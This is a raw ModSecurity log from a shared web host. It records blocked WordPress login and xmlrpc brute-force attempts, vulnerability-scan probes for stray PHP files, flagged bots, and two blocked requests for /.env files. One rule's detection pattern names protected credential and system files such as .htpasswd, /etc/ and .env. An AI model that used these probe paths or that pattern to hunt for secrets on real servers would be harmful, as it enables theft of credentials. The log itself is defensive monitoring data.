[Tue May 26 16:53:02.053715 2026] [security2:error] [pid 823496:tid 823733] [client 62.60.130.233:63653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aeromodellingconsultants.glorodavionics.com"] [uri "/wp-login.php"] [unique_id "ahWClpa08mrtyBNpA4PqfAAAAGk"], referer: https://duckduckgo.com/
[Tue May 26 16:53:03.668746 2026] [security2:error] [pid 817651:tid 817826] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCl9lGRCPPN1dS2y3FlwAAALI"]
[Tue May 26 16:53:04.375240 2026] [security2:error] [pid 823496:tid 823741] [client 20.63.34.22:12161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/kj.php"] [unique_id "ahWCmJa08mrtyBNpA4PqlwAAAHE"]
[Tue May 26 16:53:04.375370 2026] [security2:error] [pid 823496:tid 823741] [client 20.63.34.22:12161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/kj.php"] [unique_id "ahWCmJa08mrtyBNpA4PqlwAAAHE"]
[Tue May 26 16:53:06.233413 2026] [security2:error] [pid 817651:tid 817848] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCmdlGRCPPN1dS2y3FuAAAAMg"]
[Tue May 26 16:53:06.811039 2026] [security2:error] [pid 823496:tid 823746] [client 20.63.34.22:12226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wuasr.php"] [unique_id "ahWCmpa08mrtyBNpA4PqqgAAAHY"]
[Tue May 26 16:53:06.811158 2026] [security2:error] [pid 823496:tid 823746] [client 20.63.34.22:12226] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wuasr.php"] [unique_id "ahWCmpa08mrtyBNpA4PqqgAAAHY"]
[Tue May 26 16:53:07.475319 2026] [security2:error] [pid 823496:tid 823638] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCm5a08mrtyBNpA4PqrgAAAAo"]
[Tue May 26 16:53:07.882508 2026] [security2:error] [pid 823496:tid 823725] [client 31.15.21.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCm5a08mrtyBNpA4PquAAAAGE"]
[Tue May 26 16:53:08.525065 2026] [security2:error] [pid 823496:tid 823642] [client 20.63.34.22:12286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/t.php"] [unique_id "ahWCnJa08mrtyBNpA4PqwQAAAA4"]
[Tue May 26 16:53:08.525181 2026] [security2:error] [pid 823496:tid 823642] [client 20.63.34.22:12286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/t.php"] [unique_id "ahWCnJa08mrtyBNpA4PqwQAAAA4"]
[Tue May 26 16:53:09.059840 2026] [security2:error] [pid 823496:tid 823612] [remote 45.79.189.31:36080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWCnJa08mrtyBNpA4PqyAAALnE"]
[Tue May 26 16:53:09.445867 2026] [security2:error] [pid 823496:tid 823661] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCnJa08mrtyBNpA4PqxwAAACE"]
[Tue May 26 16:53:10.408808 2026] [security2:error] [pid 823496:tid 823679] [client 117.198.37.168:58977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCnpa08mrtyBNpA4Pq3AAAADM"]
[Tue May 26 16:53:10.408953 2026] [security2:error] [pid 823496:tid 823679] [client 117.198.37.168:58977] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCnpa08mrtyBNpA4Pq3AAAADM"]
[Tue May 26 16:53:11.210976 2026] [security2:error] [pid 817651:tid 817799] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCntlGRCPPN1dS2y3GAgAAAJc"]
[Tue May 26 16:53:12.780545 2026] [security2:error] [pid 823496:tid 823736] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCoJa08mrtyBNpA4Pq_QAAAGw"]
[Tue May 26 16:53:14.949891 2026] [security2:error] [pid 823496:tid 823648] [client 139.180.231.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCopa08mrtyBNpA4PrMwAAABQ"], referer: https://www.anujtradingco.com/
[Tue May 26 16:53:15.141841 2026] [security2:error] [pid 823496:tid 823636] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCopa08mrtyBNpA4PrKgAAAAg"]
[Tue May 26 16:53:15.782165 2026] [security2:error] [pid 823496:tid 823628] [client 104.28.163.45:45740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.163.28.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "baka-bau.com"] [uri "/wp-login.php"] [unique_id "ahWCo5a08mrtyBNpA4PrQQAAAAA"]
[Tue May 26 16:53:16.412001 2026] [security2:error] [pid 817651:tid 817803] [client 139.180.231.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCpNlGRCPPN1dS2y3GQAAAAJs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1255155&moderation-hash=8ab7e7b063c006b5ce3891a0c7cf066b
[Tue May 26 16:53:16.687392 2026] [security2:error] [pid 817651:tid 817877] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCo9lGRCPPN1dS2y3GNwAAAOU"]
[Tue May 26 16:53:16.698244 2026] [security2:error] [pid 817651:tid 817817] [client 69.58.72.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCpNlGRCPPN1dS2y3GSQAAAKk"], referer: https://www.anujtradingco.com/
[Tue May 26 16:53:17.929303 2026] [security2:error] [pid 817651:tid 817871] [client 69.58.72.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCpdlGRCPPN1dS2y3GZgAAAN8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 16:53:18.554837 2026] [security2:error] [pid 817651:tid 817843] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCpdlGRCPPN1dS2y3GZwAAAMM"]
[Tue May 26 16:53:19.837704 2026] [security2:error] [pid 823496:tid 823702] [client 145.239.10.137:37821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "krishnawoodworks.com"] [uri "/ulad.php"] [unique_id "ahWCp5a08mrtyBNpA4PrgwAAAEo"], referer: http://krishnawoodworks.com/ulad.php
[Tue May 26 16:53:20.701285 2026] [security2:error] [pid 823496:tid 823643] [client 117.198.37.168:59296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCqJa08mrtyBNpA4PrkwAAAA8"]
[Tue May 26 16:53:20.701426 2026] [security2:error] [pid 823496:tid 823643] [client 117.198.37.168:59296] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCqJa08mrtyBNpA4PrkwAAAA8"]
[Tue May 26 16:53:20.874349 2026] [security2:error] [pid 823496:tid 823745] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCqJa08mrtyBNpA4PrjwAAAHU"]
[Tue May 26 16:53:23.253343 2026] [security2:error] [pid 823496:tid 823737] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCqpa08mrtyBNpA4PrsQAAAG0"]
[Tue May 26 16:53:25.142133 2026] [security2:error] [pid 823496:tid 823564] [remote 20.153.140.50:54934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWCrJa08mrtyBNpA4Pr5gAAQkE"]
[Tue May 26 16:53:26.219824 2026] [security2:error] [pid 823496:tid 823542] [remote 103.230.156.120:47286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWCrZa08mrtyBNpA4Pr-QAAECs"]
[Tue May 26 16:53:26.578884 2026] [security2:error] [pid 823496:tid 823659] [client 69.58.72.214:30981] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWCrZa08mrtyBNpA4Pr-AAAAB8"], referer: https://anujtradingco.com
[Tue May 26 16:53:26.731642 2026] [security2:error] [pid 823496:tid 823665] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCrZa08mrtyBNpA4Pr9AAAACU"]
[Tue May 26 16:53:27.504719 2026] [security2:error] [pid 823496:tid 823712] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCrpa08mrtyBNpA4PsAQAAAFQ"]
[Tue May 26 16:53:28.721495 2026] [security2:error] [pid 823496:tid 823718] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCr5a08mrtyBNpA4PsIgAAAFo"]
[Tue May 26 16:53:29.882708 2026] [security2:error] [pid 823496:tid 823583] [remote 57.141.2.46:60172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWCsZa08mrtyBNpA4PsSwAAHVQ"]
[Tue May 26 16:53:30.088484 2026] [security2:error] [pid 823496:tid 823719] [client 74.7.175.137:45974] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.demo.azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahWCspa08mrtyBNpA4PsVQAAWwM"]
[Tue May 26 16:53:30.964378 2026] [security2:error] [pid 823496:tid 823649] [client 117.198.37.168:59613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCspa08mrtyBNpA4PscQAAABU"]
[Tue May 26 16:53:30.964525 2026] [security2:error] [pid 823496:tid 823649] [client 117.198.37.168:59613] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCspa08mrtyBNpA4PscQAAABU"]
[Tue May 26 16:53:31.449963 2026] [security2:error] [pid 823496:tid 823673] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCspa08mrtyBNpA4PsWQAAAC0"]
[Tue May 26 16:53:32.697640 2026] [security2:error] [pid 823496:tid 823746] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCs5a08mrtyBNpA4PseAAAAHY"]
[Tue May 26 16:53:33.390809 2026] [security2:error] [pid 823496:tid 823586] [remote 185.15.230.106:40574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.230.15.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWCtZa08mrtyBNpA4PslAAAN1c"]
[Tue May 26 16:53:35.345791 2026] [security2:error] [pid 823496:tid 823673] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCtZa08mrtyBNpA4PsqQAAAC0"]
[Tue May 26 16:53:35.551689 2026] [security2:error] [pid 823496:tid 823729] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCt5a08mrtyBNpA4Ps2AAAAGU"]
[Tue May 26 16:53:35.551718 2026] [security2:error] [pid 823496:tid 823729] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCt5a08mrtyBNpA4Ps2AAAAGU"]
[Tue May 26 16:53:35.552368 2026] [security2:error] [pid 823496:tid 823645] [client 65.21.113.244:54684] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWCt5a08mrtyBNpA4Ps1gAAABE"]
[Tue May 26 16:53:36.018108 2026] [security2:error] [pid 823496:tid 823644] [client 62.60.130.182:63244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.acacia.org.in"] [uri "/wp-login.php"] [unique_id "ahWCt5a08mrtyBNpA4Ps2QAAABA"], referer: https://wordpress.org/
[Tue May 26 16:53:36.117380 2026] [security2:error] [pid 823496:tid 823723] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCuJa08mrtyBNpA4Ps4gAAAF8"]
[Tue May 26 16:53:36.120542 2026] [security2:error] [pid 823496:tid 823666] [client 65.21.113.244:54686] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWCuJa08mrtyBNpA4Ps4AAAACY"]
[Tue May 26 16:53:36.638303 2026] [security2:error] [pid 823496:tid 823703] [client 65.21.113.244:54702] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWCuJa08mrtyBNpA4Ps5wAAAEs"]
[Tue May 26 16:53:36.685063 2026] [security2:error] [pid 823496:tid 823631] [client 62.60.130.182:65000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.acacia.org.in"] [uri "/wp-login.php"] [unique_id "ahWCuJa08mrtyBNpA4Ps7AAAAAM"], referer: https://duckduckgo.com/
[Tue May 26 16:53:36.814019 2026] [security2:error] [pid 823496:tid 823690] [client 65.21.113.244:54686] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWCuJa08mrtyBNpA4Ps8gAAAD4"]
[Tue May 26 16:53:36.860224 2026] [security2:error] [pid 823496:tid 823741] [client 62.60.130.233:53462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "usteve.com"] [uri "/wp-login.php"] [unique_id "ahWCuJa08mrtyBNpA4Ps7gAAAHE"], referer: https://duckduckgo.com/
[Tue May 26 16:53:37.040160 2026] [security2:error] [pid 823496:tid 823661] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCt5a08mrtyBNpA4PsygAAACE"]
[Tue May 26 16:53:37.208515 2026] [security2:error] [pid 823496:tid 823740] [client 62.60.130.233:50236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "usteve.com"] [uri "/wp-login.php"] [unique_id "ahWCuZa08mrtyBNpA4Ps_wAAAHA"], referer: https://www.google.de/search?q=wordpress
[Tue May 26 16:53:37.275942 2026] [security2:error] [pid 823496:tid 823646] [client 91.106.48.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWCuJa08mrtyBNpA4Ps9gAAABI"]
[Tue May 26 16:53:37.397991 2026] [security2:error] [pid 823496:tid 823636] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCuZa08mrtyBNpA4PtBgAAAAg"]
[Tue May 26 16:53:37.398015 2026] [security2:error] [pid 823496:tid 823636] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCuZa08mrtyBNpA4PtBgAAAAg"]
[Tue May 26 16:53:37.417969 2026] [security2:error] [pid 823496:tid 823655] [client 65.21.113.244:54712] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWCuZa08mrtyBNpA4PtBAAAABs"]
[Tue May 26 16:53:37.433490 2026] [security2:error] [pid 823496:tid 823668] [client 146.174.181.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCt5a08mrtyBNpA4Ps1QAAACg"]
[Tue May 26 16:53:37.445081 2026] [security2:error] [pid 823496:tid 823640] [client 176.65.139.232:24508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "madhuraclinic.svijaykumar.in"] [uri "/.env"] [unique_id "ahWCuZa08mrtyBNpA4PtBwAAAAw"]
[Tue May 26 16:53:37.466375 2026] [security2:error] [pid 823496:tid 823748] [client 176.65.139.232:24518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWCuZa08mrtyBNpA4PtCAAAAHg"]
